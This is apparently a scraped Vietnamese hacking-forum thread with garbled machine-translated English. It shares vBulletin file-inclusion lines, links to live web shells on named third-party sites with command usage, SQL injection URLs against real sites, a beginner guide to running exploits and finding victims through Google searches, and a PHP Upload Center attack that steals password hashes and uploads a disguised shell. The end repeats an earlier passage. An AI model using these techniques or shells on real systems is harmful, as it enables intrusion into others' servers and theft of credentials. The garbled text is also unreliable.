In examining the files of the Forum,vBulletin version 3.6.0 was Thgrtin one I tested and very effective and the second managed me a lot because most forums Hazvh file or Hatin wall firearm, but two risk the first volume in the Install file specifically tableprefix.php programmatic error in line 31 PHP Code: Trích: require_once(DIR . "/{$vbulletin->config['Misc']['admincpdir']}/global.php"); _________________________ The gap is the second deadliest lies in the main page of the Forum file payment gateway.php PHP Code: Trích: if (file_exists(DIR . '/includes/paymentapi/class_' . $api['classname'] . '.php')) Patching up, :amendment file any editor has not forgotten the answer is a back-up copy of the file in the event of an error detection : By Me investment :there is no protection of the security of noticeable deficiencies would be remedied :FileInclusion ok ! tìm được đó, MOD dịch thuật ra đây khai thác lỗi nhá ! đã thấy QX147(HCEgroup.biz) New shell for practising :D 1 con shell anh em vào nghịch nhé http://11moves.com/modlogan/401.php Famydmx(hcegroup.biz) Share pà kon con cmdshell JSP nghịch chơi http://www.congty501.com/imgupload/cmdexec.jsp Xem chơi thôi nhá, đừng nghịch wa' nhé bác gõ như thế này nó mới chạy được : cmd /c dir c:\ Hehe, thêm cái "cmd /c" ở đầu thì mún làm gì tuỳ ý. Chuc' pà kon vui vẻ. Web server Apache-Coyote mà pác. Mà có command shell thì cũng làm được khối việc roài . famydmx(hcegroup.biz) sql inject dạng này hơi lạ http://www.burningshed.com/index.asp?page=band&id=80%20and%201=user http://www.any-domains.com/domain_client.asp sql injection by pass @langtuhaohoa(hcegroup.biz) Làm thế nào để triển trai Exploit ?? Nếu bạn là người mới biết thì nên đọc qua ! Để triển khai mã khai thác của 1 ứng dụng nào đó thì bạn phải cần biết mã khai thác đó được viết bằng ngôn ngữ gì ! Thông thường là : Perl , Php , C Và tất nhiên để chạy được các Exploit được viết = ngôn ngữ nào đó thì trên máy của bạn phải có trình biên dịch nó ! Download Perl : http://pxperl.com/?pxperl Biên dịch C bạn có thể dùng cgywin : http://www.cygwin.com/ để download còn PHP thì hầu như máy bạn nào cũng có rồi hĩ ?? Chỉ cần cài localhost + PHP là được mừh ! nếu bạn nào chưa cài localhost thì có thể dùng AppServ : www.appservnetwork.com để download ! Thường thì trong mỗi exploit đều có hướng dẫn sữ dụng ! Bạn dựa theo đó mà triển khai nhé Good luck to you ! langtuhaohoa(HCE) Sử dụng các exploit bằng php Trước hết máy bạn cần phải cài đặt php . Thường thì sau khi cài xong ta có thư mục c:\php (cài trên win) Tiếp theo save code exploit lại thành filename.php , copy và paste vào c:\php Để exploit bạn vào Run và type : cmd Sau khi đã vào dos : cd c:\php nếu là php5 thì type : php-cgi filename.php để chạy filename.php nếu là php4 thì type : php filename.php Navaro(HCE) Cơ bản về exploit Tut for newbie Exploit có nghĩa khai thác , ở đây có nghĩa là khai thác các "lỗ hổng bảo mật" đã được công bố ( hoặc chưa ), nó khai thác bằng một code đuợc lập trình sẵn perl , C , php , etc Đây là 1 kỹ thuật khá phổ biến để hack , nó có ưu điểm là dễ , nhanh nhưng cũng có nguợc điểm là nếu người sử dụng ko hiểu nó thì việc làm của họ chỉ mang tính chất của 1 scrip kid ( em cũng chỉ hiểu được 1 phần thui > trình còi ) .Đầu tiên để exploit đuợc thì cũng phải có 1 chút ít tiếng anh Các trang công bố cách exploit như -www.securiteam.com -www.securityfocus.com -milw0rm.com -Astalavista.com Hay ở vniss nè cũng okay Có thể dùng 1 số tools scan xem trang web đấy có dính lỗi nào ko như - Xscan :http://www.securitylab.ru/software/233255.php -Acunetix Web Vulnerability Scanner : http://www.acunetix.com/vulnerabilit tyscanner3.exe ( ai có full cái nè thì share cái ) Chú ý trước khi exploit phải bít rõ các câu lệnh tìm kiếm trong google để tìm victim cho mình : tham khảo về câu lệnh tìm kiếm google ở đây : Bây h sẽ là 1 số ví dụ để mọi người hiểu thêm về exploit http://66.29.6.213/~lehung/ebook/Len ong.google.rar Cái nè exploit cũng khá đơn giản , bạn chỉ cần làm theo hướng dẫn là có thể dễ dàng hack đuợc Code: PHP Upload Center Download users password hashes And phpshell Upload Site:http://ksv.hypermart.net/php/ 1)Download users password hashes: http://victim.com/path/users/username 2)phpshell Upload Example: Download http://geocities.ocm/liz0zim/shell.php And shell.php Save As shell.php.li And Upload Web Sİte http://victim.com/path/files/shell.php.li 1) Download users password hashes Example: http://www.sattv.ru/upload/users/Admin 2)Upload PhpShell Example: http://ha.bums.dk/upload/files/liz0.php.li Credit :Liz0ziM Website:www.biyosecurity.com Mail :liz0@bsdmail.com Source: http://www.blogcu.com/Liz0ziM/317250/ http://biyosecurity.be/bugs/phpuploadcenter2.txt cũng khá đơn giản http://victim.com/path/users/username > download passhash save 1 con shell thành duôi .php.li rùi up lên thui nó sẽ có link http://victim.com/path/files/shell.php.li . google ở đây : Bây h sẽ là 1 số ví dụ để mọi người hiểu thêm về exploit http://66.29.6.213/~lehung /ebook/ Len ong.google.rar Cái nè exploit cũng khá đơn giản , bạn chỉ cần làm theo hướng dẫn là có